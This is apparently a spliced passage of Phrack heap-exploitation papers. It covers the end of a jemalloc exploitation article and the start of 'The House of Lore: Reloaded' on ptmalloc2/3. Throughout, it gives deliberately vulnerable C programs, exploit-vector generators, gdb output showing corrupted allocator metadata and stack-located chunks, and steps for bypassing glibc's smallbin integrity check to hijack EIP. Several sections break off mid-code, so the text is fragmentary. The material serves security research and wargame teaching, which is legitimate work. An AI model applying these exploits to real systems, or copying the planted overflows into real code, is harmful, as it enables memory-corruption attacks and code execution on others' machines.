printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
__asm__("int3");
__asm__("int3");
At the first breakpoint we can see that for size 16 the run is at
0xb7d01000 and for size 32 the run is at 0xb7d02000:
gdb $ r
[Thread debugging using libthread_db enabled]
[+] region one: 0xb7d01030: AAAAAAAAAAAAAAAA
[+] region two: 0xb7d01040: BBBBBBBBBBBBBBBB
[+] region three: 0xb7d02020: CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
We can see that the run's metadata and specifically the address of the
'bin' element (see [2-3]) has been overwritten. One way or the other, the
attacker will be able to alter the contents of run #2's header, but once
this has happened, what's the potential of achieving code execution?
A careful reader would have already thought the obvious; one can overwrite
the 'bin' pointer to make it point to a fake bin structure of his own.
Well, this is not a good idea for two reasons. First, the attacker
needs further control of the target process in order to successfully
construct a fake bin header somewhere in memory. Secondly, and most
importantly, as it has already been discussed, the 'bin' pointer of a
region's run header is dereferenced only during deallocation. A careful
study of the jemalloc source code reveals that only 'run->bin->reg0_offset'
is actually used (somewhere in 'arena_run_reg_dalloc()'), thus, from an
attacker's point of view, the bin pointer is not that interesting
('reg0_offset' overwrite may cause further problems as well leading to
crashes and a forced interrupt of our exploit).
if(argc < 2)
{
printf("%s <offset>\n", argv[0]);
return 0;
}
    ...
    i = run->regs_minelm;
    mask = run->regs_mask[i]; /* [3-4] */
    if (mask != 0) {
        /* Usable allocation found. */
        bit = ffs((int)mask) - 1; /* [3-5] */
        ...
        return (ret);
    }
...
}
~$ gdb ./vuln-run
GNU gdb 6.1.1 [FreeBSD]
...
(gdb) run -2
Starting program: vuln-run -2
Allocating a chunk of 16 bytes just for fun
one = 0x28202030
Allocating first chunk of 32 bytes
two = 0x28203020
Performing more 32 byte allocations
...
temp = 0x28203080
...
Setting up a run for the next size class
three = 0x28204040
Notice how the memory region numbered 'four' (64 bytes) points exactly
where the chunk named 'temp' (32 bytes) starts. Voila :)
Before continuing with our analysis, let's set the foundations of the
test case we will cover.
[[Arena #1 header][R...R][C...C]]
The low level function responsible for allocating memory pages (called
'pages_map()'), is used by 'chunk_alloc_mmap()' in a way that makes it
possible for several distinct arenas (and any possible arena extensions)
to be physically adjacent. So, once the attacker requests a bunch of
new allocations, the memory layout may resemble the following figure.
p1 = (char *)malloc(16);
/* [3-8] */
print_arena_chunk(base2);
/* [3-9] */
/* Allocate one more region right after the first region of the
* new chunk. This is done for demonstration purposes only.
*/
p2 = malloc(16);
/* [3-10] */
if(argc > 1) {
if((fd = open(argv[1], O_RDONLY)) > 0) {
/* Read the contents of the given file. We assume this file
* contains the exploitation vector.
*/
memset(buffer, 0, sizeof(buffer));
l = read(fd, buffer, sizeof(buffer));
close(fd);
/* [3-11] */
*/
free(p2);
print_region(first, 16);
/* [3-12] */
/* [3-13] */
Before going further, the reader is advised to read the comments and the
code above very carefully. You can safely ignore 'print_arena_chunk()'
and 'print_region()', they are defined in the file lib.h found in the code
archive and are used for debugging purposes only. The snippet is actually
split in 6 parts which can be distinguished by their corresponding '[3-x]'
tags. Briefly, in part [3-8], the vulnerable program performs a number
of allocations in order to fill up the available space served by the
first arena. This emulates the fact that an attacker somehow controls
the order of allocations and deallocations on the target, a fair and
very common prerequisite. Additionally, the last call to 'malloc()'
(the one before the while loop breaks) forces jemalloc to allocate a new
arena chunk and return the first available memory region. Part [3-9],
performs one more allocation, one that will lie next to the first (that
is the second region of the new arena). This final allocation is there
for demonstration purposes only (check the comments for more details).
Part [3-10] is where the actual overflow takes place and part [3-11]
calls 'free()' on one of the regions of the newly allocated arena. Before
explaining the rest of the vulnerable code, let's see what's going on when
'free()' gets called on a memory region.
void
free(void *ptr)
{
    ...
    if (ptr != NULL) {
        ...
        idalloc(ptr);
    }
}
huge_dalloc(ptr);
}
static void
arena_dalloc_large(arena_t *arena, arena_chunk_t *chunk, void *ptr)
{
    malloc_spin_lock(&arena->lock);
    ...
    arena_run_dalloc(arena, (arena_run_t *)ptr, true);
    malloc_spin_unlock(&arena->lock);
}
There are two important things to notice in the snippet above. The first
thing to note is the way 'pageind' is calculated. Variable 'ptr' points
to the start of the memory region to be free()'ed while 'chunk' is the
address of the corresponding arena chunk. For a chunk that starts at
e.g. 0x28200000, the first region to be given out to the user may start
at 0x28201030 mainly because of the overhead involving the metadata of
chunk, arena and run headers as well as their bitmaps. A careful reader
may notice that 0x28201030 is more than a page away from the start
of the chunk, so 'pageind' is larger than or equal to 1. It is for this
purpose that we are mostly interested in overwriting 'chunk->map[1]'
and not 'chunk->map[0]'. The second thing to catch our attention is
the fact that, at [3-19], 'size' is calculated directly from the 'bits'
element of the overwritten bitmap. This size is later converted to the
number of pages comprising it, so, the attacker can directly affect the
number of pages to be marked as free. Let's see 'arena_run_dalloc':
static void
arena_run_dalloc(arena_t *arena, arena_run_t *run, bool dirty)
{
    arena_chunk_t *chunk;
    size_t size, run_ind, run_pages;
    ...
        chunk->ndirty += run_pages;
        arena->ndirty += run_pages;
    }
    else {
        ...
    }

    chunk->map[run_ind].bits = size | (chunk->map[run_ind].bits &
        PAGE_MASK);
    chunk->map[run_ind+run_pages-1].bits = size |
        (chunk->map[run_ind+run_pages-1].bits & PAGE_MASK);
    ...
}
Continuing with our analysis, one can see that at [3-20] the same
size that was calculated in 'arena_dalloc_large()' is now converted
to a number of pages and then all 'map[]' elements that correspond to
these pages are marked as dirty (notice that 'dirty' argument given
to 'arena_run_dalloc()' by 'arena_dalloc_large()' is always set to
true). The rest of the 'arena_run_dalloc()' code, which is not shown
here, is responsible for forward and backward coalescing of dirty
pages. Although not directly relevant for our demonstration, it's
something that an attacker should keep in mind while developing a real
life reliable exploit.
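The two computations discussed above boil down to a few shifts and masks. A
simplified sketch with concrete numbers (ours; a 4 KB page size is assumed):

#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT 12
#define PAGE_MASK  ((1UL << PAGE_SHIFT) - 1)

int main(void)
{
    uintptr_t chunk = 0x28200000;    /* arena chunk base                   */
    uintptr_t ptr   = 0x28201030;    /* region being free()'ed             */
    size_t    bits  = 0x00002001;    /* map[pageind].bits, reachable by the
                                        overflow; low bits are flags       */

    size_t pageind   = (ptr - chunk) >> PAGE_SHIFT;  /* here: 1            */
    size_t size      = bits & ~PAGE_MASK;            /* 0x2000             */
    size_t run_pages = size >> PAGE_SHIFT;           /* 2 pages freed      */

    printf("pageind = %lu, size = 0x%lx, run_pages = %lu\n",
        (unsigned long)pageind, (unsigned long)size,
        (unsigned long)run_pages);

    return 0;
}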
Last but not least, it's interesting to note that, since the attacker
controls the 'arena' pointer, the map elements that correspond to the
freed pages are inserted in the given arena's red black tree. This can be
seen at [3-22] where 'arena_avail_tree_insert()' is actually called. One
may think that since red-black trees are involved in jemalloc, she can
abuse their pointer arithmetic to achieve a '4 bytes anywhere' write
primitive. We urge all interested readers to have a look at rb.h, the
file that contains the macro-based red black tree implementation used
by jemalloc (WARNING: don't try this while sober).
2) Overwrite the 'arena' pointer of arena B's chunk and make it point
to an already existing arena. The address of the very first arena of
a process (call it arena A) is always fixed since it's declared as
static. This will prevent the allocator from accessing a bad address
and eventually segfaulting.
3) Force or let the target application free() any chunk that belongs to
arena B. We can deallocate any number of pages as long as they are marked
as allocated in the jemalloc metadata. Trying to free an unallocated page
will result in the red-black tree implementation of jemalloc entering
an endless loop or, rarely, segfaulting.
The exploit code for the vulnerable program presented in this section
can be seen below. It was coded on an x86 FreeBSD-8.2-RELEASE system, so
the offsets of the metadata may vary for your platform. Given the address
of an existing arena (arena A of step 2), it creates a file that contains
the exploitation vector. This file should be passed as argument to the
vulnerable target (full code in file exploit-chunk.c):
if(argc != 2) {
fprintf(stderr, "%s <arena>\n", argv[0]);
return 0;
}
memset(buffer, 0, sizeof(buffer));
p = buffer;
strncpy(p, "1234567890123456", 16);
p += 16;
/* Arena address. */
*(size_t *)p = (size_t)strtoul(argv[1], NULL, 16);
p += sizeof(size_t);
p += 32;
It is now time for some action. First, let's compile and run the vulnerable
code.
$ ./vuln-chunk
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
p3 = 0x28302000
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
The output is what one expects it to be. First, the vulnerable code forces
the allocator to initialize a new chunk (0x28300000) and then requests
a memory region which is given the address 0x28301030. The next call to
'malloc()' returns 0x28302000. So far so good. Let's feed our target
with the exploitation vector and see what happens.
$ ./exploit-chunk 0x8049d98
$ ./vuln-chunk exploit2.v
# Chunk 0x28200000 belongs to arena 0x8049d98
# Chunk 0x28300000 belongs to arena 0x8049d98
...
Read 56 bytes
# Region at 0x28301030
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
p3 = 0x28301000
# Region at 0x28301030
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
As you can see the second call to 'malloc()' returns a new region
'p3 = 0x28301000' which lies 0x30 bytes before 'first' (0x28301030)!
2) Overwrite of the run metadata (in case the overflown region is the
last in a run).
3) Overwrite of the arena chunk metadata (in case the overflown region
is the last in a chunk).
That said we believe we have covered most of the cases that an attacker
may encounter. Feel free to contact us if you think we have missed
something important.
mag_rack_t *
mag_rack_create(arena_t *arena)
{
    ...
    return (arena_malloc_small(arena, sizeof(mag_rack_t) +
        (sizeof(bin_mags_t) * (nbins - 1)), true));
}
A size of 240 is actually serviced by the bin holding regions of 256 bytes.
Issuing calls to 'malloc(256)' will eventually end up in a user controlled
region physically bordering a 'mag_rack_t'. The following vulnerable code
emulates this situation (file vuln-mag.c):
if(arg)
strcpy(v, (char *)arg);
return NULL;
}
if(argc != 3) {
printf("%s <thread_count> <buff>\n", argv[0]);
return 0;
}
tcount = atoi(argv[1]);
tid = (pthread_t *)alloca(tcount * sizeof(pthread_t));
pthread_join(vid, NULL);
for(i = 0; i < tcount; i++)
pthread_join(tid[i], NULL);
pthread_exit(NULL);
}
if(argc != 2) {
printf("%s <mag_t address>\n", argv[0]);
return 1;
}
fake_mag_t_p = (size_t)strtoul(argv[1], NULL, 16);
*/
printf("[*] Assuming fake mag_t is at %p\n", (void *)fake_mag_t_p);
*(size_t *)&fake_mag_t[0] = 0x42424242;
*(size_t *)&fake_mag_t[4] = 0xffffffff;
*(size_t *)&fake_mag_t[8] = 0x41414141;
fake_mag_t[12] = 0;
setenv("FAKE_MAG_T", fake_mag_t, 1);
$ ./exploit-mag
./exploit-mag <mag_t address>
$ ./exploit-mag 0xdeadbeef
[*] Assuming fake mag_t is at 0xdeadbeef
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
...
$ ./exploit-mag 0xbfbfedd6
[*] Assuming fake mag_t is at 0xbfbfedd6
[*] Preparing input buffer
[*] Executing the vulnerable program
[*] 0xbfbfedd6
[vuln] v = 0x28311100
[673283456] p1 = 0x28317800
...
[673283456] p2 = 0x42424242
[673282496] p2 = 0x3d545f47
Neat. One of the victim threads, the one whose magazine rack is overflown,
returns an arbitrary address as a valid region. Overwriting the thread
caches is probably the most lethal attack but it suffers from a limitation
which we do not consider serious. The fact that the returned memory region
and the 'bin_mags[]' element both receive arbitrary addresses, results in a
segfault either on the deallocation of 'p2' or once the thread dies by
explicitly or implicitly calling 'pthread_exit()'. Possible shellcodes
should be triggered _before_ the thread exits or the memory region is
freed. Fair enough... :)
For a detailed case study on jemalloc heap overflows see the second Art of
Exploitation paper in this issue of Phrack.
--[ 5 - Future work

This paper is the first public treatment of jemalloc that we are aware
of. In the near future, we are planning to research how one can corrupt
the various red black trees used by jemalloc for housekeeping. The rbtree
implementation (defined in rb.h) is fully based on preprocessor macros
and it's quite complex in nature. Although we have already debugged them,
due to lack of time we didn't attempt to exploit the various tree
operations performed on rbtrees. We hope that someone will continue our
work from where we left off. If no one does, then you definitely know whose
articles you'll soon be reading :)
--[ 6 - Conclusion
Many thanks to the Phrack staff for their comments. Also, thanks to George
Argyros for reviewing this work and making insightful suggestions.
Finally, we would like to express our respect to Jason Evans for such a
leet allocator. No, that isn't ironic; jemalloc is, in our opinion, one of
the best (if not the best) allocators out there.
--[ 7 - References
[PV10]
 - http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
[UJEM] unmask_jemalloc
- https://github.com/argp/unmask_jemalloc
2. The House Of Lore: Reloaded - blackngel
|=-----------------------------------------------------------------------=|
|=-------------------=[ The House Of Lore: Reloaded ]=-------------------=|
|=-------------=[ ptmalloc v2 & v3: Analysis & Corruption ]=-------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by blackngel ]=-------------------------=|
|=-----------------------------------------------------------------------=|
^^
*`* @@ *`* HACK THE WORLD
* *--* *
## <[email protected]>
|| <[email protected]>
* *
* * (C) Copyleft 2010 everybody
_* *_
--[ CONTENTS
1 - Preface
2 - Introduction
4 - Analysis of Ptmalloc3
4.3.2 - dnmalloc
6 - Conclusions
7 - Acknowledgments
8 - References
9 - Wargame Code
.-----------.
---[ 1 ---[ Preface ]---
.-----------.
No offense, I could say that sometimes the world of hackers (at least) is
divided into two camps:
1.- The illustrious characters who spend many hours to find holes in
the current software.
2.- And the hackers who spend most of their time to find a way to
exploit a vulnerable code/environment that does not exist yet.
Maybe it is a bit confusing, but this is like the old question: which
came first, the chicken or the egg? Or better... which came first, the bug
or the exploit?
Unlike an ordinary Heap Overflow, which we could call the logical
progression over time of a Stack Overflow, something special and strange
seems to happen with The House of Lore technique: we know it's there (a
thorn in your mind), that something happens, that something is wrong and
that we can exploit it.

But we do not know how to do it. And that is what all this is about: we
know the technique (at least the Phantasmal Phantasmagoria explanation),
but has anyone ever seen a sample of vulnerable code that can actually be
exploited with it?
3.- What are the names of those sequences? Are the sequences a bug or
is it pure luck?
This can give much food for thought. If Phantasmal had left clear
evidence of his theory, surely we would have forgotten about it, but as
this did not happen, some of us spend whole days analyzing how to create
a piece of code that can be attacked with a technique that a virtual
expert gave us in 2005 in a magnificent article that everyone already
knows, right?
We speak about the "Malloc Maleficarum" [1], a great theory that I myself
had the opportunity to demonstrate in practice in the "Malloc
Des-Maleficarum" [2] article. But unfortunately I left one job unresolved.
In the past I was not able to correctly interpret one of the techniques
presented by Phantasmal, we speak of course of "The House of Lore"
technique, but in a moment of creativity it seems that I finally found a
solution.
Here I submit the details of how a vulnerable piece of code can be
attacked with The House of Lore (THoL from now on), thus completing a
stage that for some reason was left unfinished.

In addition, we will target not only the smallbin corruption method which
many have heard of, but we will also introduce the complications of the
largebin method and how to solve them. I also present two variants based
on these techniques that I have found to corrupt the Ptmalloc3 structures.

There is also more content in this paper, such as a small program to
which one of the techniques can be applied; it is very useful for an
exploiting wargame.

And... yes, THoL was exactly the thorn that I had in my mind.
.----------------.
---[ 2 ---[ Introduction ]---
.----------------.
We mention that dynamic hooks could be a better way to this goal. More
control, more conspicuous.
.-----------------------.
---[ 2.1 ---[ KiddieDbg Ptmalloc2 ]---
.-----------------------.
In an effort to make things easier for the reader when we perform all the
subsequent tests, let's indicate the simple way you can use PTMALLOC2 to
obtain the necessary information from within each attack.
To avoid the tedious task of recompiling GLIBC when one makes a minor
change in "malloc.c", we decided to directly download the sources of
ptmalloc2 from: http://www.malloc.de/malloc/ptmalloc2-current.tar.gz.
great effort to type a make) and you can directly link it as a static
library to each of our examples like this:
And now, enough jokes, here are the small changes in "malloc.c" to get some
information at runtime:
Void_t*
_int_malloc(mstate av, size_t bytes)
{
    ....
    checked_request2size(bytes, nb);

    if (in_smallbin_range(nb)) {
        idx = smallbin_index(nb);
        bin = bin_at(av,idx);

        if ( (victim = last(bin)) != bin) {
            bck = victim->bk;
            ...
            set_inuse_bit_at_offset(victim, nb);
            bin->bk = bck;
            bck->fd = bin;

            if (av != &main_arena)
                victim->size |= NON_MAIN_ARENA;
            check_malloced_chunk(av, victim, nb);

            return chunk2mem(victim);
        }
    }
}
Here we can know when a chunk is extracted from its corresponding bin to
satisfy a memory request of the appropriate size. In addition, we can
observe the value that the "bk" pointer of a chunk takes if it has been
previously altered.
use_top:
    victim = av->top;
    size = chunksize(victim);

    ...

    bck = unsorted_chunks(av);
    fwd = bck->fd;

    p->bk = bck;
    p->fd = fwd;
    bck->fd = p;
    fwd->bk = p;

    printf("\n[PTMALLOC2] -> (Freed and unsorted chunk [ %p ])", p);
Unlike the first two changes, which were introduced in the "_int_malloc( )"
function, the latter was made in "_int_free( )" and clearly indicates when a
chunk has been freed and placed into the unsorted bin for further use.
.-----------------------.
---[ 2.2 ---[ SmallBin Corruption ]---
.-----------------------.
Take again before starting the piece of code that will trigger the
vulnerability described in this paper:
if (in_smallbin_range(nb)) {
    idx = smallbin_index(nb);
    bin = bin_at(av,idx);

    if ( (victim = last(bin)) != bin) {
        ...
        if (av != &main_arena)
            victim->size |= NON_MAIN_ARENA;
        check_malloced_chunk(av, victim, nb);
        return chunk2mem(victim);
    }
To reach this area of the code inside "_int_malloc( )", one assumes that
the size of the memory request is larger than the current value of
"av->max_fast", in order to pass the first check and avoid fastbin[ ]
utilization. Remember that this value is "72" by default.
We know from the documentation that the bins for sizes of less than 512
bytes always contain chunks of the same size. With this we know that if a
chunk of a certain size has been introduced in its corresponding bin, a further
request of the same size will find the appropriate bin and will return the
previously stored chunk. The functions "smallbin_index(nb)" and
"bin_at(av, idx)" are responsible for finding the appropriate bin for the
chunk requested.
We also know that a "bin" is a couple of pointers "fd" and "bk", the
purpose of the pointers is to close the doubly linked list of the free
chunks. The macro "last(bin)" returns the pointer "bk" of this "fake
chunk", it also indicates the last available chunk in the bin (if any). If
none exists, the pointer "bin->bk" will be pointing to the bin itself, the
check will fail and execution will fall out of the smallbin code.
If all is correct, the user is given the pointer *mem of victim by the
macro "chunk2mem(victim)."
The only extra tasks in this process are to set the PREV_INUSE bit of the
contiguous chunk, and also to manage the NON_MAIN_ARENA bit if victim is
not in the main arena by default.
The only value that someone can control in this whole process is obviously
the value of "victim->bk". But to accomplish this, a necessary condition
must be satisfied:
1 - That two chunks have been allocated previously, that the latter has
been freed and that the first will be vulnerable to an overflow.
If this is true, the overflow of the first chunk will allow us to manipulate
the header of the already freed second chunk, specifically the "bk" pointer
because other fields are not interesting at this time. Always remember that
the overflow must always occur after the release of this second piece, and
I insist on it because we do not want to blow the alarms within
"_int_free()" before its time.
In this attack one must be careful with the statement "bck->fd = bin", since
this code writes the bin's address into the "fd" pointer to close the
linked list; this memory area must have write permissions.
The only last thing really important for the success of our attack:
When a chunk is freed, it is inserted into the known "unsorted bin". This
is a special bin, also a doubly linked list, with the peculiarity that the
chunks are not sorted (obviously) according to the size. This bin is like a
stack, the chunks are placed in this bin when they are freed and the chunks
will always be inserted in the first position.
bck = victim->bk
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);
which is the same as saying: the bin points to the penultimate chunk, and
the penultimate chunk points to the bin which becomes the latest chunk in
the list.
Once removed from the list, two things can happen. Either the size of the
removed chunk matches the request made (size == nb), in which case the
memory of this chunk is returned to the user, or it does not coincide, and
that is when the chunk is placed into its appropriate bin.
Why do we mention this? Well, the condition that we mentioned requires that
the freed and manipulated chunk will be introduced in its appropriate bin,
since as Phantasmal said, altering an unsorted chunk is not interesting at
this time.
With this in mind, our vulnerable program should call malloc( ) between the
vulnerable copy function and the subsequent call to malloc( ) requesting
the same size as the recently freed chunk. In addition, this intermediate
call to malloc( ) should request a size larger than the released one, so
that the request cannot be served from the unsorted list of chunks and the
pieces are instead sorted into their respective bins.
This is where the pointer "*mem" is returned pointing to the stack, thus
giving full control of the attacked system. However, as there are people
who need to see in order to believe, read on in the next section.
Note: I have not checked all versions of glibc, and some changes have been
made since I wrote this paper. For example, on an Ubuntu box (with glibc
2.11.1) we see the following fix:
bck = victim->bk;
if (__builtin_expect (bck->fd != victim, 0))
{
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;
bck->fd = bin;
This check can still be overcome if you control an area on the stack and
can write an integer whose value is equal to the address of the recently
freed chunk (victim). This must happen before the next call to malloc( )
with the same requested size.
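In other words, the fake chunk that the corrupted "bk" points to must
itself look sane. A minimal sketch of the layout needed on the stack (the
struct name is mine, only used for illustration):

/* fake chunk that the corrupted buff2->bk points to */
struct fake_chunk {
    size_t prev_size;   /* irrelevant                                      */
    size_t size;        /* irrelevant for the smallbin path                */
    void  *fd;          /* MUST hold the address of the freed chunk, so
                           that "bck->fd != victim" does not fire          */
    void  *bk;          /* must point to writable memory, as before; for
                           the second same-size malloc() an analogous fd
                           constraint applies to the chunk it points to    */
};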
[ Albert Einstein ]
.-------------------------.
---[ 2.2.1 ---[ Triggering The HoL(e) ]---
.-------------------------.
Below is the vulnerable program, followed by a detailed description:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char *buff1, *buff2, *buff3;

void evil_func(void)
{
    printf("\nThis is an evil function. You become a cool \
hacker if you are able to execute it.\n");
}

void func1(void)
{
    char *lb1, *lb2;

    /* two allocations of the same size as the freed chunk (step 6);
       the program then reads the user's answer into the second one */
    lb1 = (char *) malloc(128);
    printf("\nLB1 -> [ %p ]", lb1);
    lb2 = (char *) malloc(128);
    printf("\nLB2 -> [ %p ]\n", lb2);
    fgets(lb2, 128, stdin);
}

int main(int argc, char *argv[])
{
    malloc(4056);
    buff1 = (char *) malloc(16);
    printf("\nBuff1 -> [ %p ]", buff1);
    buff2 = (char *) malloc(128);
    printf("\nBuff2 -> [ %p ]", buff2);
    buff3 = (char *) malloc(256);
    printf("\nBuff3 -> [ %p ]\n", buff3);

    free(buff2);
    malloc(256);              /* fourth piece, larger than the freed chunk (step 4) */
    strcpy(buff1, argv[1]);   /* the vulnerable copy (overflow of buff1) */
    func1();
    return 0;
}
2) We allocate three chunks of memory, of 16, 128 and 256 bytes
respectively. Since no chunk has been released before, we know that they
must be taken from the Wilderness or Top Chunk.
3) We free() the second chunk of 128 bytes. This is placed in the unsorted
bin.
4) We allocate a fourth piece larger than the most recently freed chunk.
"buff2" is now extracted from the unsorted list and added to its
appropriate bin.
6) We call func1( ), which allocates two blocks of 128 bytes (the same size
as the previously released piece) to formulate a question and get a user
response.
We can see that the first 3 malloc'ed chunks are taken from the TOP; then
the second chunk (0x0804fff8) is passed to free() and placed in the
unsorted bin. This piece will remain there until the next call to malloc( )
indicates whether it can meet the demand or not.
Since the fourth buffer allocated is larger than the recently freed one, it
is again taken from TOP, and buff2 is extracted from the unsorted bin and
inserted into the bin corresponding to its size (128).
Afterwards we see how the next call to malloc(128) (lb1) triggers the
smallbin code, returning the same address as the previously freed buffer.
You can also see the value of "victim->bk", which is what (lb2) should
receive after this.
However, we can see in the output that lb2 is taken from the TOP and not
from a smallbin. Why? Simple: we had just released a single chunk (the bin
corresponding to this size held only that one piece), and since we have not
altered the "bk" pointer of the released piece, the next check,
"(victim = last(bin)) != bin", finds that the last piece in the bin points
to the bin itself, and therefore the allocation must be taken from
somewhere else.
So far so good. Then, what do we need to exploit the program?
2) This address, in turn, must fall on a spot such that the "bk" pointer of
this fake chunk is an address with write permissions.
3) The address of evil_func(), with which we want to overwrite EIP, and the
necessary padding to reach the saved return address.
But the important thing here is that we must overwrite buff2->bk with the
value "0xbffff33c" so that the new victim->bk takes a writable address.
And now, without further delay, let's see what happens when we merge all
these elements into a single attack:
...
This is an evil function. You become a cool hacker if you are able to
execute it. // We get a cool msg.
Compile this example against a normal GLIBC and you will get the same
result; just remember to adjust the address of evil_func( ) or of the area
where you have stored your arbitrary code.
[ Socrates ]
.----------------------------.
---[ 2.2.2 ---[ A More Confusing Example ]---
.----------------------------.
This is a crude imitation of an agent manager. The only things this program
can do are create a new agent, edit it (i.e. edit its name and description)
or delete it. To save space, one can edit only certain fields of an agent,
leaving the others unset so they do not take up memory, or freeing them
when no longer needed.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void main_menu(void);
void create_agent(void);
void select_agent(void);
void edit_agent(void);
void delete_agent(void);
void edit_name(void);
void edit_lastname(void);
void edit_desc(void);
void delete_name(void);
void delete_lastname(void);
void delete_desc(void);
void show_data_agent(void);
/* agent structure (reconstructed from its use below) */
typedef struct agent {
    int   id;
    char *name;
    char *lastname;
    char *desc;
} agent_t;

agent_t *agents[256];
int agent_count = 0;
int sel_ag = 0;
void main_menu(void)
{
int op = 0;
char opt[2];
/* menu printing omitted in this listing; read the user's option */
fgets(opt, 2, stdin);
op = atoi(opt);
switch (op) {
case 1:
create_agent();
break;
case 2:
select_agent();
break;
case 3:
show_data_agent();
break;
case 4:
edit_agent();
break;
case 0:
exit(0);
default:
break;
}
main_menu();
}
void create_agent(void)
{
agents[agent_count] = (agent_t *) malloc(sizeof(agent_t));
sel_ag = agent_count;
agents[agent_count]->id = agent_count;
agents[agent_count]->name = NULL;
agents[agent_count]->lastname = NULL;
agents[agent_count]->desc = NULL;
printf("\nAgent %d created, now you can edit it", sel_ag);
agent_count += 1;
}
void select_agent(void)
{
char ag_num[2];
int num;
/* selection of sel_ag from user input omitted in this listing */
}
void show_data_agent(void)
{
printf("\nAgent [%d]", agents[sel_ag]->id);
printf("\nName: ");
if(agents[sel_ag]->name != NULL)
printf("%s", agents[sel_ag]->name);
printf("\nLastname: ");
if(agents[sel_ag]->lastname != NULL)
printf("%s", agents[sel_ag]->lastname);
printf("\nDescription: ");
if(agents[sel_ag]->desc != NULL)
printf("%s", agents[sel_ag]->desc);
}
void edit_agent(void)
{
int op = 0;
char opt[2];
/* menu printing omitted in this listing; read the user's option */
fgets(opt, 2, stdin);
op = atoi(opt);
switch (op) {
case 1:
edit_name();
break;
case 2:
edit_lastname();
break;
case 3:
edit_desc();
break;
case 4:
delete_name();
break;
case 5:
delete_lastname();
break;
case 6:
delete_desc();
break;
case 7:
delete_agent();
break;
case 0:
main_menu();
default:
break;
}
edit_agent();
}
void edit_name(void)
{
if(agents[sel_ag]->name == NULL) {
    agents[sel_ag]->name = (char *) malloc(32);
}
/* vulnerable read: up to 322 bytes into a 32-byte buffer (see below) */
fgets(agents[sel_ag]->name, 322, stdin);
}
void delete_name(void)
{
if(agents[sel_ag]->name != NULL) {
free(agents[sel_ag]->name);
agents[sel_ag]->name = NULL;
}
}
void edit_lastname(void)
{
if(agents[sel_ag]->lastname == NULL) {
agents[sel_ag]->lastname = (char *) malloc(128);
printf("\n[!!!]malloc(ed) lastname [ %p ]",agents[sel_ag]->lastname);
}
/* non-vulnerable read into lastname (size matches the allocation) */
fgets(agents[sel_ag]->lastname, 128, stdin);
}
void delete_lastname(void)
{
if(agents[sel_ag]->lastname != NULL) {
free(agents[sel_ag]->lastname);
agents[sel_ag]->lastname = NULL;
}
}
void edit_desc(void)
{
if(agents[sel_ag]->desc == NULL) {
agents[sel_ag]->desc = (char *) malloc(256);
printf("\n[!!!]malloc(ed) desc [ %p ]", agents[sel_ag]->desc);
}
/* non-vulnerable read into desc (size matches the allocation) */
fgets(agents[sel_ag]->desc, 256, stdin);
}
void delete_desc(void)
{
if(agents[sel_ag]->desc != NULL) {
free(agents[sel_ag]->desc);
agents[sel_ag]->desc = NULL;
}
}
void delete_agent(void)
{
if (agents[sel_ag] != NULL) {
free(agents[sel_ag]);
agents[sel_ag] = NULL;
if (sel_ag == 0) {
agent_count = 0;
printf("\n[!] Empty list, please create new agents\n");
} else {
sel_ag -= 1;
agent_count -= 1;
printf("[+] Current agent selection: %d\n", sel_ag);
}
} else {
printf("\n[!] No agents to delete\n");
}
}
This is the perfect program that I would present in a wargame to those who
wish to apply the technique described in this paper.
Another technique that one might consider viable would be The House of
Force, since at first it seems easy to corrupt the Wilderness (the Top
Chunk). But remember that, in order to apply this method, one of the
requirements is that the size of a call to malloc( ) must be controlled by
the attacker, with the main goal of corrupting "av->top". This seems
impossible here.
Other techniques are also unworkable for several reasons, each due to their
intrinsic requirements. So we must study how to order the steps that
trigger the vulnerability and the attack process that we have studied so
far.
After a quick look, we found that the only vulnerable function is:
void edit_name(void) {
...
agents[sel_ag]->name = (char *) malloc(32);
...
fgets(agents[sel_ag]->name, 322, stdin);
For this, what we do is create a new agent(1), select the first agent(0)
and delete its "lastname" field, then select the second agent(1) and edit
its description. This is equivalent to:
After this last call to malloc( ), the freed chunk of 128 bytes (lastname)
will have been placed in its corresponding bin. Now we can alter the "bk"
pointer of this chunk, and for this we select the first agent(0) again and
edit its name (there will be no call to malloc( ) here, since it has been
previously assigned).
At this time, we can place a proper memory address pointing to the stack
and make two calls to malloc(128), first editing the "lastname" field of
the second agent(1) and then editing the "lastname" field of agent(0) one
more time.
These last actions should return a memory pointer located on the stack at a
position of your choice, and any content written to "agents[0]->lastname"
can corrupt a saved return address.
Without wishing to dwell much longer, we show here how a tiny exploit
alters the aforementioned "bk" pointer and returns a chunk of memory
located on the stack:
#!/usr/bin/perl
And here is the result, displaying only the outputs of interest for us:
.....
.....
.....
.....
.....
.....
.....
.....
.....
.....
.....
.....
.....
Everyone can predict what happened in the end, but GDB can clarify a few
things for us:
And you have moved on to the next level of your favorite wargame, or at
least you have increased your level of knowledge and skills.
Now, I encourage you to compile this program with your regular glibc (not
the static Ptmalloc2) and verify that the result is exactly the same; the
inner code does not change.
I don't know if anyone has noticed it, but another technique that in
principle could be applied to this case is the forgotten House of Prime.
The requirement for applying it is the manipulation of the headers of two
chunks that will be freed. This is possible since an overflow in
agents[]->name can overwrite both agents[]->lastname and agents[]->desc,
and we can decide both when to free them and in what order. However, The
House of Prime also needs at least the possibility of placing an integer
on the stack to overcome a last check, and this is where it seems that we
get stuck. Also, remember that since glibc 2.3.6 one can no longer pass to
free( ) a chunk smaller than 16 bytes, whereas this is the first
requirement inherent to that technique (altering the size field of the
